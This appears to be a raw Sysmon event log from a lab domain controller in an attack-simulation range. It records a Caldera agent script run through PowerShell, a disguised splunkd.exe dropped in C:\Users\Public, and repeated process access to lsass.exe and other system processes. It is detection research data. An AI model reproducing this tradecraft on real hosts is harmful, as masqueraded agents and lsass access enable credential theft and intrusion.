AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{5EBD8912-8CC0-6151-1800-00000000FD01}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 11241100x80000000000000001052923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localEXE2021-09-27 09:20:08.150{5EBD8912-8CC0-6151-1800-00000000FD01}1952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2021-09-23 08:15:58.405 10341000x80000000000000001052922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC1-6151-1F00-00000000FD01}2076C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC5-6151-2000-00000000FD01}2552C:\Users\Public\sandcat.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC1-6151-1900-00000000FD01}2004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.135{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC0-6151-1300-00000000FD01}360C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.119{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC1-6151-1B00-00000000FD01}2028C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.119{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC1-6151-1A00-00000000FD01}2016C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.119{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC1-6151-1E00-00000000FD01}1996C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 10341000x80000000000000001052902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:08.119{5EBD8912-8CC0-6151-1800-00000000FD01}19522512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5EBD8912-8CC1-6151-1D00-00000000FD01}1764C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8620|UNKNOWN(00007FFD39633F61) 13241300x80000000000000001052901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001052900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001052899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001052898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\FlagsDWORD (0x00000000) 13241300x80000000000000001052897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\TtlDWORD (0x000004b0) 13241300x80000000000000001052896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\SentPriUpdateToIpBinary Data 13241300x80000000000000001052895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\SentUpdateToIpBinary Data 13241300x80000000000000001052894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\DnsServersBinary Data 13241300x80000000000000001052893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\HostAddrsBinary Data 13241300x80000000000000001052892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\PrimaryDomainNameattackrange.local 13241300x80000000000000001052891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\AdapterDomainName(Empty) 13241300x80000000000000001052890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:07.416{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\Hostnamewin-dc-429 10341000x80000000000000001052889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 